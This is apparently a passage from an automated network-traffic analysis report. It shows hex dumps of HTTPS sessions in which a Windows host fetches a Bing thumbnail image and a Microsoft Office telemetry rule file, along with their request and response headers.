                                                                          2024-12-08 19:51:17 UTC16384INData Raw: b2 a0 cb 4c 14 ae e6 27 27 80 54 01 ea 73 e9 58 36 76 16 71 f8 66 09 1f 4c 8a fe 59 c9 fb 4a 42 04 91 97 2c 00 94 20 e3 ae 39 18 07 9f 5c d6 87 c3 9f 1b da 78 67 ca f0 e4 f1 4a d6 02 67 df 0e 0b cd 60 c7 a0 db d7 61 20 f5 e3 18 c1 eb 55 92 62 30 f4 f3 28 56 c5 68 a3 7b 76 4d db 56 75 e7 b4 b1 32 ca aa d0 c1 25 79 da fd da 57 d1 7f 5d cf 4e 74 c5 46 c2 ae 42 f6 f7 76 cb 73 6b 3a cd 0c 9c ab a1 04 1f fe b8 f4 a8 64 4c 75 af d7 21 52 33 8a 94 5d d3 3f 10 a9 4e 50 93 8c 95 9a dc ae 45 18 15 26 da 6e 3b d5 dc 8b 0d c0 a2 9f 8a 4d be d4 80 6e 05 04 66 9d 8c 51 40 0c 02 97 02 97 14 62 80 19 4b 8a 7e 05 00 0e 72 dd bf 3a 06 86 62 93 06 a4 c0 a4 c5 02 12 90 8f 4a 5c 1a 30 68 01 00 a4 c1 a7 60 d2 e2 80 19 83 46 0d 38 0a 36 fb 53 b8 09 8a 4c 1a 76 0d 14 5c 2d 61 a4
                                                                          Data Ascii: L''TsX6vqfLYJB, 9\xgJg`a Ub0(Vh{vMVu2%yW]NtFBvsk:dLu!R3]?NPE&n;MnfQ@bK~r:bJ\0h`F86SLv\-a
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: f7 e2 af d9 e3 c4 da c3 88 26 f1 e5 94 16 5f c5 05 bd 83 f3 e9 92 5f e6 fc 48 aa 7a 0f ec b9 a3 da cc 5b 5c f1 3d ed e2 8e 89 67 6e b0 7e 6c c5 ff 00 41 5f 44 b3 67 ad 43 21 dd 5f 65 87 c9 b0 14 52 8c 29 e9 f3 3f 3b c4 e7 38 ec 44 dd 4a 93 bc 9f 5d 3f a5 f2 3c b6 1f 82 1f 0c e1 b1 36 a3 c3 4f 23 15 00 dc 3d ec de 6e 40 fb c0 86 00 13 ec 31 5e 79 f1 0b f6 73 bc 19 9f c1 3a f1 c1 27 36 5a 9b 05 60 31 fc 32 a8 c1 f4 c3 01 f5 35 f4 74 aa 2a b4 82 ba aa 65 98 3a b1 b3 82 5e 9a 1c d4 f3 2c 5c 1d f9 db 3e 21 f1 57 c3 af 89 1e 1c dc da 9f 87 f5 25 84 31 1e 7c 0a 67 88 e3 be e8 f7 0c 57 2d 75 a8 6a 6d 6e 2c ee 6e a7 31 c4 c7 11 3b 1c 29 ef c7 f4 af d0 06 0c ad b9 1c ab 7a a9 20 fe 95 ce f8 db c1 fe 1b f1 65 9b 5b 78 87 46 b6 bc cf 2b 36 cd 93 a1 f5 12 2f cc 0f b1
                                                                          Data Ascii: &__Hz[\=gn~lA_DgC!_eR)?;8DJ]?<6O#=n@1^ys:'6Z`125t*e:^,\>!W%1|gW-ujmn,n1;)z e[xF+6/
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 77 8b b3 3c 13 c5 9f b3 0f 87 2e 66 96 6f 0d f8 86 fb 4c de 72 96 f7 70 8b 88 94 e7 a6 f0 55 b1 f5 04 fd 6b cc 7c 67 f0 57 e2 37 85 ed 25 b9 7b 18 f5 7b 18 ce 1a 5d 36 43 33 2a f6 63 11 01 c0 f7 db 81 5f 62 b0 34 d0 18 36 41 21 87 42 38 35 e6 57 c9 f0 d5 16 8a cc ee a1 9a 57 a4 fb 9f 9f 6a cc 24 2b 73 3f 92 50 90 41 07 70 23 b1 18 c8 a9 34 db f7 b3 9b 31 2c 72 2b 01 b9 b2 01 fd 78 af b7 bc 73 e0 2f 07 f8 c3 e6 f1 27 87 ed 2f 66 d9 b4 5c e0 c7 38 1f f5 d1 08 27 1e e4 d7 8d 78 fb f6 60 80 ef bb f0 4e bc d1 b8 e5 6c 75 4e 54 fb 2c ca 38 f6 0c bf 8d 78 d5 f2 4a d0 bf 2f bc bc 8f 5a 8e 73 06 d7 47 fd 7c 8f 13 8a f2 2b a9 9e 47 b7 50 55 b7 31 03 d6 a7 8d 6d e4 84 e4 cb 1b 74 04 60 82 7d 08 f7 fa d4 7e 3f f0 5f 8c 3c 11 7f 1c 3e 25 d2 a6 b5 56 39 86 70 44 90 4b
                                                                          Data Ascii: w<.foLrpUk|gW7%{{]6C3*c_b46A!B85WWj$+s?PAp#41,r+xs/'/f\8'x`NluNT,8xJ/ZsG|+GPU1mt`}~?_<>%V9pDK
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 52 af 5a 50 29 ca 3d 68 b8 00 04 d4 8a be bd 69 14 63 a5 38 0a 42 b8 a0 52 f4 a2 80 33 40 21 d4 28 cd 14 a0 62 81 8f 51 9e 69 1a 85 a5 c0 a9 00 5e 94 a0 51 8a 50 29 dc 00 0c 51 4e 51 4b 8f 7a 43 b0 ca 31 9a 7e 31 d2 97 14 05 88 f6 d0 54 d4 ca b4 e5 5c d1 70 3c ff 00 e2 d7 c2 ed 13 c7 8d 15 cd cc b3 59 6a 30 20 48 ee e1 01 b2 a0 e4 2b 29 c0 60 32 79 c8 23 3f 85 79 3e b9 f0 13 e2 05 ac 81 34 7d 4b 47 d4 2d d7 3b 0c 8e 60 7f a1 56 e3 3f 42 6b e9 c4 8b 35 32 41 9f e1 ae 0c 46 5f 85 ae ef 38 ea 76 e1 f3 2c 56 1d 72 c2 5a 1f 0c f8 df c3 9f 10 3c 2b 23 1d 6f 47 b8 b5 8e 33 fe bd 22 2d 11 f4 c3 8c a9 fc eb 33 c2 be 29 6b 2b e2 6e e7 91 56 5c 06 2a 01 1e c4 8f 6f 51 5f 7b dc 59 09 23 28 e9 b9 18 61 94 8c a9 1e e0 f0 6b c1 bf 6a 4f 87 ff 00 0d ac b4 19 f5 7b b1 1e
                                                                          Data Ascii: RZP)=hic8BR3@!(bQi^QP)QNQKzC1~1T\p<Yj0 H+)`2y#?y>4}KG-;`V?Bk52AF_8v,VrZ<+#oG3"-3)k+nV\*oQ_{Y#(akjO{
                                                                          2024-12-08 19:51:17 UTC16069INData Raw: d1 8a 57 01 9b 69 71 4b 81 46 05 17 01 b8 34 b8 a5 c1 a5 c5 17 1d 86 e2 8c 53 b1 46 28 0b 0d c5 18 a5 c1 a5 c5 2b 85 86 60 d1 83 4f c5 18 a2 e3 b3 19 83 46 0d 3f 14 05 a5 71 d8 66 0d 18 35 26 da 4c 51 cc 16 3e 2a 5a 72 e2 91 45 3d 56 be e2 e7 83 ca 0b d6 9e b4 aa 29 e0 52 b8 86 a8 34 f5 14 a1 69 c1 69 5c 05 51 4f 0b 48 b4 f0 29 5c 76 15 45 38 0a 14 53 87 b5 2b 8c 50 31 4b 48 05 3b 14 ee 3b 02 8c d3 94 7a d0 a3 14 f0 31 48 60 a2 9d 48 b4 e0 29 5c 62 81 8a 70 e2 9b 4e 03 34 82 c2 81 4a b9 a0 0c d3 80 f4 a2 e3 01 cd 38 0c 50 29 c3 8a 9e 60 10 7b d3 80 34 01 4a 06 68 e6 00 02 94 0a 51 4b 8a 39 83 50 51 de 9d 8a 45 eb 4e a9 1d 84 03 34 b4 60 d1 4e e1 60 a2 8a 29 00 75 a4 22 96 8a 04 37 06 a1 d5 ef e1 d2 74 5b cd 56 e7 98 6c 6d de e2 41 ea a8 09 23 f1 c6 2a c0
                                                                          Data Ascii: WiqKF4SF(+`OF?qf5&LQ>*ZrE=V)R4ii\QOH)\vE8S+P1KH;;z1H`H)\bpN4J8P)`{4JhQK9PQEN4`N`)u"7t[VlmA#*
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 72 01 7d bc 06 4c 91 d4 71 c7 bd 69 58 f8 0f 4b b4 fb 56 a9 a0 66 d8 4d 6e 4c b6 71 a9 08 ac 39 3f 2f 46 f6 20 67 a8 e6 b0 ec c5 e5 bf 88 61 37 d7 11 9b 3b 98 9f 74 6a ab 20 64 1d 4a 30 0a 4e 0e d3 c8 04 64 f0 3a d7 24 e4 b9 99 e9 50 e6 e5 dc ee be 01 de a5 97 c6 3b 21 38 0e 97 0b 2d ac 6d 8c 14 91 d0 e3 af 18 38 c7 1e b5 f4 5b 8a f9 2b 4e b9 b8 d3 bc 44 fa 9d b0 64 6b 49 d6 68 65 c7 0c ca 55 d0 9e df 30 c1 ed 90 4d 7d 69 6f 3c 77 76 70 dd c5 fe ae e2 35 95 3f dd 65 04 7e 86 be bb 86 eb 29 50 9d 2e a9 df ef 3f 3d e3 bc 33 58 9a 58 95 b4 93 5f 38 bf f8 23 1a 9a 45 48 d4 d2 2b e8 ee 7c 18 cc 1a 55 18 a5 a2 97 30 09 8a 50 31 45 0b d6 86 c7 61 54 62 96 8a 17 a5 4d c7 60 a5 5a 3d e9 68 b8 ac 0b d2 9d 4d 5e b4 ea 57 1f 28 2f 4a 30 68 a2 95 c7 ca 14 ea 17 a5 03
                                                                          Data Ascii: r}LqiXKVfMnLq9?/F ga7;tj dJ0Nd:$P;!8-m8[+NDdkIheU0M}io<wvp5?e~)P.?=3XX_8#EH+|U0P1EaTbM`Z=hM^W(/J0h
                                                                          2024-12-08 19:51:18 UTC16384INData Raw: b2 c7 13 02 8e 87 18 6e c4 90 4e 31 ec 29 7d 6e 3d 86 b0 b2 be a7 d6 0d 19 1d 45 37 69 af 04 5f 89 be 34 d3 a4 8e d6 4b b9 9e 35 42 8a cf 18 72 48 ea df 3a e4 fe 3c d6 a6 95 f1 cb 50 8d 52 de ff 00 4f b5 99 e3 61 e6 4a 32 ae ca 3a f0 0e 32 7d 71 c7 a5 69 1c 45 39 2d c8 9e 1a 51 76 b9 ec d8 34 57 94 cd f1 da d4 42 cd 1f 86 66 67 04 6d 3e 7f ca 47 7c f0 0d 17 df 1d ac 84 70 1b 3f 0e ca 49 61 e7 79 d3 e1 76 f7 da 40 ce 7e a2 b4 55 21 dc c7 92 5d 8f 57 00 d2 a8 35 e4 b3 fc 7b b2 59 36 27 85 e6 6f 90 60 9b a1 8d d9 e9 90 bd 31 e9 55 65 f8 ed a9 1b df 26 df c3 76 20 18 cb 03 25 c3 1c 60 64 73 c7 3e d8 14 7b 48 77 1f 23 3d 27 e2 96 b3 79 e1 cf 87 ba a6 b9 61 68 6e 6e 6d 20 2d 12 05 2c 03 13 8d c4 0e c3 39 fc 2b e4 db 8f 14 ea 1a f6 a1 25 fe b5 78 d7 d7 0d fc 52
                                                                          Data Ascii: nN1)}n=E7i_4K5BrH:<PROaJ2:2}qiE9-Qv4WBfgm>G|p?Iayv@~U!]W5{Y6'o`1Ue&v %`ds>{Hw#='yahnnm -,9+%xR


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          53192.168.2.449812150.171.27.10443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:16 UTC346OUTGET /th?id=OADD2.10239385875217_1AS9NW8J4VEXSVA8E&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: tse1.mm.bing.net
                                                                          Connection: Keep-Alive
                                                                          2024-12-08 19:51:17 UTC854INHTTP/1.1 200 OK
                                                                          Cache-Control: public, max-age=2592000
                                                                          Content-Length: 490391
                                                                          Content-Type: image/jpeg
                                                                          X-Cache: TCP_HIT
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Headers: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Timing-Allow-Origin: *
                                                                          Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                          NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          X-MSEdge-Ref: Ref A: 650C40F150B84856AD07224EAAE64749 Ref B: EWR30EDGE0214 Ref C: 2024-12-08T19:51:17Z
                                                                          Date: Sun, 08 Dec 2024 19:51:16 GMT
                                                                          Connection: close
                                                                          2024-12-08 19:51:17 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 13 ac 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 36 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 38 3a 31 34 20 30 38 3a 32 36 3a 31 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                          Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 24.6 (Windows)2023:08:14 08:26:168
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: ea 80 71 1b a9 18 7a 51 92 29 39 2d 41 3a 08 c2 a2 60 77 54 cd 9a 6b 8c f2 2a 65 b0 d0 88 05 3d 52 98 a3 e6 c5 4a 87 35 50 dc 99 ec 39 69 eb 4d 5c 53 f9 ad cc 04 61 4b 1d 23 50 a7 15 84 b7 3a 61 27 62 5e 69 8c 71 48 cd 9f bb 4d 63 59 bb a3 54 d3 1f 9a 4a 45 34 e5 39 a9 6d 96 ac 19 a9 14 fc b5 1a 8a 7a 11 57 4a 56 66 55 63 74 3f 6e 69 bb 4a d3 d7 9a 7a a8 35 d3 1a ae e7 2c e9 2b 5c 85 73 4e e6 a5 65 14 bb 7e 5a df 98 e6 71 20 6a 4c 7c d5 63 66 69 3c 93 4f 99 13 66 56 c5 2d 4e d0 e2 8f 2b 14 73 a1 a8 b6 44 a3 34 ec 62 9f b7 14 8c 47 7a 9e 71 a8 b1 ab 43 52 b3 0a 8e 59 00 ac 67 51 23 78 53 62 e7 de 9a c6 9b bc 9a 6b 71 5c ee 4c eb 8c 10 3f 34 8c 70 d4 d5 39 a6 3b 1a 9e 64 55 98 f6 61 42 b8 0d f7 aa 07 26 98 ec 45 62 e4 ee 5a b6 c5 ed c2 a4 50 0d 50 b7 90 f7
                                                                          Data Ascii: qzQ)9-A:`wTk*e=RJ5P9iM\SaK#P:a'b^iqHMcYTJE49mzWJVfUct?niJz5,+\sNe~Zq jL|cfi<OfV-N+sD4bGzqCRYgQ#xSbkq\L?4p9;dUaB&EbZPP
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: a6 34 7f 35 5a 92 15 99 16 01 a6 3e 3a 1a 9d a2 27 f8 69 9e 43 ff 00 76 9f 32 17 29 59 f6 f4 34 54 c6 da 4d b9 db 45 57 32 21 c5 b2 da 3a 1e 4a d3 b3 15 46 ab f2 d2 32 d7 c3 b9 9f 60 a2 4d 88 cf f1 52 3a 8d bc 55 76 ca d0 8e 0f 15 94 aa 1a c6 93 63 a4 4a 85 90 d4 ce 7f da a6 ed ac 25 3b 9b c5 34 45 b3 bd 47 24 75 6b 1f 2d 23 63 a5 66 f5 35 8c 9a 29 32 62 91 93 2b 56 d9 01 a6 34 75 93 4c d6 33 28 c9 0e 78 a8 1e 2d bf c3 5a 5b 01 eb 51 b4 40 d6 6e 36 36 8d 43 35 a3 a6 b4 39 ab ed 18 dd 4d 68 e9 1a f3 99 53 5b ff 00 b3 54 a6 b7 ad e7 4c f5 aa d7 10 03 54 a4 d1 51 96 a6 04 96 e7 ba d5 3b ab 52 7a 56 ec 90 fc d8 a6 c9 6b b9 6b 45 55 a3 6d 0e 61 22 2b 27 35 7e d9 33 56 e6 b1 c7 34 c4 8b 63 55 4a aa 68 d1 6a 3a 18 f0 d5 6a 31 eb 51 c6 2a c2 0c d7 2c a7 a9 76 1d
                                                                          Data Ascii: 45Z>:'iCv2)Y4TMEW2!:JF2`MR:UvcJ%;4EG$uk-#cf5)2b+V4uL3(x-Z[Q@n66C59MhS[TLTQ;RzVkkEUma"+'5~3V4cUJhj:j1Q*,v
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: a6 31 4f ee d1 b8 55 07 2f 90 ff 00 b4 1a 72 dc 31 a8 b7 0e cb 42 9a 57 0e 55 d8 98 4e f4 34 d2 7f 7a a2 cf bd 19 f7 a6 2e 45 d8 7b 48 df de a4 67 27 ad 36 a3 76 c3 50 52 89 3f be ea 2a 0d f9 5a 29 dc 7c ac f9 87 ec 8f fd da 6a d9 9f ee d7 76 ba 28 6e 36 d4 73 68 a1 5b fd 55 7d 57 f6 ac 7b 9e df d4 e2 71 b1 d9 be da 7a da b8 ae d2 d7 41 12 6e c2 d3 9b c3 af d9 69 7f 6a c7 b8 be a6 8e 27 ec a6 91 ad 4d 76 53 68 45 3e f2 d4 4f a2 c8 5b 85 ab 8e 67 17 d4 9f a9 a3 92 4b 73 fd da 91 6d b3 5d 4a e8 72 f5 db 43 69 12 0f f9 65 4f fb 4a 3d c9 fa a5 8e 61 2d 9e 9f f6 77 15 d3 c3 a4 4a eb f7 69 df d8 f2 0f e0 a9 fe d1 8d f7 0f aa 9c ba c2 e2 a4 44 71 d5 6b a1 7d 2d ff 00 bb 51 49 a6 30 5c ed a3 eb d1 61 f5 76 63 a7 15 22 ca cb d2 af b6 9e ff 00 dd a6 49 a7 c9 d9 69
                                                                          Data Ascii: 1OU/r1BWUN4z.E{Hg'6vPR?*Z)|jv(n6sh[U}W{qzAnij'MvShE>O[gKsm]JrCieOJ=a-wJiDqk}-QI0\avc"Ii
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 70 ff 00 f7 ca d2 34 30 0f e1 a8 5a 79 19 7f 8a a0 79 4d 0a 94 8a f6 88 b3 35 b0 7f f5 55 1f d9 65 35 1c 73 c8 ad 91 56 52 e5 dd 70 6a fd 9c 90 b9 e2 47 f6 70 17 3b b9 a8 2e 6e 7c ae 23 a7 5b df e9 f7 3a 84 96 50 5e 46 d7 51 2e 64 89 5b 95 14 eb cb 8d 3e d9 97 ed f7 96 d1 1f fa 69 20 56 f5 ad 23 49 f5 44 3a 9d 8a 6d 2d c3 b7 1b aa 68 ee 67 8f e4 32 fc d5 8f 7f e3 4d 0a df cc 09 14 f3 95 62 23 58 f0 cb 20 1d f3 d8 55 19 3c 75 a6 7d 9d 8c 1a 44 fe 77 f0 ac 8c 36 fd 4d 6c a8 73 7d 91 73 c8 dc 71 23 48 d2 48 dc d3 56 e2 78 9b 03 f8 6b 98 4f 1c 4a 2c 55 25 d2 23 96 e5 7e f4 8b 26 c4 6f c2 a6 b7 f1 bd a0 b5 fd ee 95 27 9d fc 4a ad f2 56 ea 86 96 68 87 29 9d 0b de ce cc be b5 6f ed b3 c7 0e 4f cc d5 c3 5d 78 c6 f5 e4 63 69 63 6d 00 fe 1d d9 76 5f af 6a a0 fe 21
                                                                          Data Ascii: p40ZyyM5Ue5sVRpjGp;.n|#[:P^FQ.d[>i V#ID:m-hg2Mb#X U<u}Dw6Mls}sq#HHVxkOJ,U%#~&o'JVh)oO]xcicmv_j!
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 14 e3 8f 7f cf 0a ee 6f ee b5 4f e6 5c 45 cf 91 b4 ff 00 bb f2 d3 de 2f 9b 3b b6 ff 00 b4 b4 c5 13 aa e2 36 f3 3f de aa 72 4c d5 24 89 1e 49 5e 35 3b 99 4d 22 f9 ed cf cb 8f ef 6e aa f2 49 8d c2 75 65 0d fd da 10 c6 78 46 92 31 ff 00 7d 51 ca 4c a4 3e e1 e4 49 94 06 5c 7f b5 53 42 e5 f6 a7 9b b8 ff 00 b5 55 64 8c bc 6c 4c fe 61 5f f6 7e 6a 8a 38 cf 4f 37 fe fa a7 ca 9a 33 6d b2 ed c4 4e 24 c7 6f ef 2d 42 f1 46 db b1 f2 95 fe f5 3e dc 4e 38 dd e6 7f c0 aa 45 0f f2 9b 88 b9 5f ee d2 d5 0a c5 0e 57 e4 3b 57 fd da 6e 71 c1 96 b6 91 63 75 cc 71 7f c0 59 6a 39 2d f7 7c c8 8b fe d2 ed a4 ab 6b 61 d9 98 cb 11 76 c0 f9 a9 5a d4 ab 60 f5 ad 2f b3 63 71 f9 97 fd d5 db 50 4d 04 bb 72 25 ff 00 80 b2 d6 8a a5 c4 54 78 71 fc 54 dd 88 38 7a b0 d1 4e 5b 05 55 bf da a4 78
                                                                          Data Ascii: oO\E/;6?rL$I^5;M"nIuexF1}QL>I\SBUdlLa_~j8O73mN$o-BF>N8E_W;WnqcuqYj9-|kavZ`/cqPMr%TxqT8zN[Ux
                                                                          2024-12-08 19:51:17 UTC16384INData Raw: 8f da bb 4b 8d 37 e5 cf 99 b9 7f ba d5 9b 79 a1 5d 4f 0e 60 58 f6 b7 f7 5b b5 6f 1c 5c 65 a3 33 39 bd e1 77 1f 95 b7 55 76 64 3c ed db 5a ed a2 5f 95 67 16 cc ca ad 8f 97 e6 e9 55 26 b0 9d 1b 0f 04 8b fe f2 9a e8 8d 48 5b 46 2b 15 a3 30 6e 5a 75 c4 68 63 de 8b c5 48 d1 30 eb fe 71 52 2c 60 c2 c0 2f 2b cd 37 34 3b 14 18 02 df 77 8a 63 ae 7a 74 ab 8a 03 2f dd a7 3c 60 2e 76 f3 5a f3 95 ca 50 d8 e1 71 da 98 ca ff 00 82 d5 b7 84 fd fa 8f cb 7f be 7e 5a d1 49 32 5c 59 0f f0 b5 23 a0 2d 80 d4 f7 42 3a 7f df 54 6c c3 73 45 c9 b1 5e 44 fb d9 a6 2a e7 e9 57 1e 3c af dd a6 3c 2e 3e 95 4a 7a 19 b8 b2 ba 0c 7f 06 ea 56 1b 3a 6e 5a b0 b1 ec 5c d0 a3 72 f3 4f 98 56 20 67 7f 98 16 fb d4 ee 15 70 1b 75 4a f1 fa d3 55 11 5b de 9f 32 2a cc 8d f3 bb 14 e5 52 17 3d e9 70 ff
                                                                          Data Ascii: K7y]O`X[o\e39wUvd<Z_gU&H[F+0nZuhcH0qR,`/+74;wczt/<`.vZPq~ZI2\Y#-B:TlsE^D*W<<.>JzV:nZ\rOV gpuJU[2*R=p
                                                                          2024-12-08 19:51:17 UTC16067INData Raw: c0 f1 27 83 e5 6b 8b 59 34 3b 3f b3 6d 52 93 ab c8 1b 76 3f 8b f1 ab de 19 bb 97 c3 be 5c f7 9a 7b 32 ab 1f 35 b7 1d bc 75 ce 2b ab 45 2a d1 a9 6d c5 6b 49 52 29 b4 99 6d ee 36 b0 97 86 56 50 77 0f e9 58 4f 30 9c e0 a1 55 5d 7e 26 eb 03 18 be 78 3b 32 83 f8 82 cf 54 d0 db 56 d2 6d a4 49 a2 93 64 96 8c a5 d3 67 69 3c ce 33 9f 4c 55 cb 5b cf 33 61 91 7c ad cb 9d b4 d9 87 91 0e db 58 a3 8a 2f ee c6 b8 a9 1a 7f 3a 35 fb 64 4b 86 fb ac bf 7b f1 ae 29 38 3f 81 68 75 d3 8c 97 c4 ee 2c c5 d3 6b 8f 9a 3f f6 68 1e 5f f1 a3 62 98 ea 63 5e 3e 65 db f2 ed a9 2c ee 50 ae c9 17 ff 00 1d a8 67 44 77 1e a1 11 94 85 fb d5 6a d9 24 96 4c 7c d8 5a 4b 34 47 6d 9b 57 6f f0 d6 9d 9c 66 15 c7 f7 7f bd fc 55 c9 56 a2 89 d5 4e 04 b6 2a 91 47 90 bb 76 fd ea 75 d6 a6 f1 ae 43 6e 15
                                                                          Data Ascii: 'kY4;?mRv?\{25u+E*mkIR)m6VPwXO0U]~&x;2TVmIdgi<3LU[3a|X/:5dK{)8?hu,k?h_bc^>e,PgDwj$L|ZK4GmWofUVN*GvuCn
                                                                          2024-12-08 19:51:18 UTC16384INData Raw: b4 31 46 91 c6 8d 1b 7f 7a 4c 9c e4 e7 d3 a5 57 f0 dc ad 61 78 b3 ac b2 2f 94 9f 33 45 f7 a3 eb c7 3d ea 6d 4b 4c ba b4 d1 62 9e ed a3 8d 77 10 ab bb e6 ce 71 59 7e 24 d4 50 dd 47 0d 9a ee 86 24 11 f9 91 fc be 66 3b fe 34 e9 c5 4d 38 c3 66 69 29 38 bb c8 d8 fb 6d b9 b8 ff 00 44 83 cf b8 ba dc 3c 89 3e 7f 2f 3c 67 3d db bd 51 ba 32 5c df 7f a4 33 65 17 0c bb 7e ee 2a 1d 2b 58 7b 4b 39 c5 ad 9c 7e 64 aa 07 da 64 5d cf 1f 39 3b 3d 33 d3 e9 4f 8d ef d9 b7 db 7c d2 bf 2c bb 7b 53 f6 6e 0c 89 54 e6 48 a9 76 41 dd 2c 7f 2a af 0b b7 f8 aa 6d 35 cf 98 c1 1b 71 65 f9 97 6d 74 1e 1f b2 b4 5b 1f 32 eb 4a 69 25 78 0b c5 1c 92 71 31 62 54 11 e9 83 4b 67 a5 3a c9 3d a8 b1 91 66 89 09 55 6f bd c7 07 ff 00 1e a8 9e 22 3a c4 5e ca 5a 0f 99 f4 5b 8f 0f b2 5d c1 34 ba 93 c8
                                                                          Data Ascii: 1FzLWax/3E=mKLbwqY~$PG$f;4M8fi)8mD<>/<g=Q2\3e~*+X{K9~dd]9;=3O|,{SnTHvA,*m5qemt[2Ji%xq1bTKg:=fUo":^Z[]4
                                                                          2024-12-08 19:51:18 UTC16384INData Raw: 99 87 91 0b 0d de ed b7 eb 5d 66 b9 e1 c7 92 48 af 23 be 9a e9 57 f8 62 f9 5b f1 15 cf c9 25 93 48 d1 c3 e7 c6 c8 df 3e ec ee fc ab b2 9d 78 d4 57 8e a2 e6 8b 2b b3 21 5d 91 aa a3 7f 13 46 bb 7a 7d 69 88 f1 a6 e3 f7 8f f7 57 f8 a9 75 09 04 2b e6 79 4d 21 ff 00 69 b6 ff 00 fa ea 86 8f fd a1 75 78 d1 44 ca d1 c7 cb 48 be fd b3 5b c6 2d c5 ca fa 10 f6 26 ba d4 52 16 6c 40 b2 32 fd d5 dd b7 8c 77 ac eb c5 bb d4 a3 63 e5 79 4c dc ae ee 51 7f 1a dd 5b 43 6f 23 19 63 59 ff 00 bc cc c3 72 fb 54 17 4d e6 ae 24 8a 66 55 fe 15 6a d2 9d 48 c5 fb ab e6 62 56 f0 dc 77 02 d6 4b 3d 46 d9 6e 47 58 b6 b7 dd ff 00 81 0e 94 6b e2 4f 39 20 8a 3b 6b 78 7a 79 af 8f 97 fd d1 d4 d1 70 f7 a9 6f f6 7b 1b 36 65 ea cd 23 7d ef a9 ac eb 5d 32 e2 f7 56 4f b6 dc c1 1e d6 1b 95 5b 3b 73
                                                                          Data Ascii: ]fH#Wb[%H>xW+!]Fz}iWu+yM!iuxDH[-&Rl@2wcyLQ[Co#cYrTM$fUjHbVwK=FnGXkO9 ;kxzypo{6e#}]2VO[;s


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          54192.168.2.44981513.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:17 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:17 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:17 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 474
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                          ETag: "0x8DC582B9964B277"
                                                                          x-ms-request-id: 27a1a40f-f01e-0096-7d0b-4810ef000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195117Z-r1cf579d7788pwqzhC1EWRrpd800000006dg00000000ad5t
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:17 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 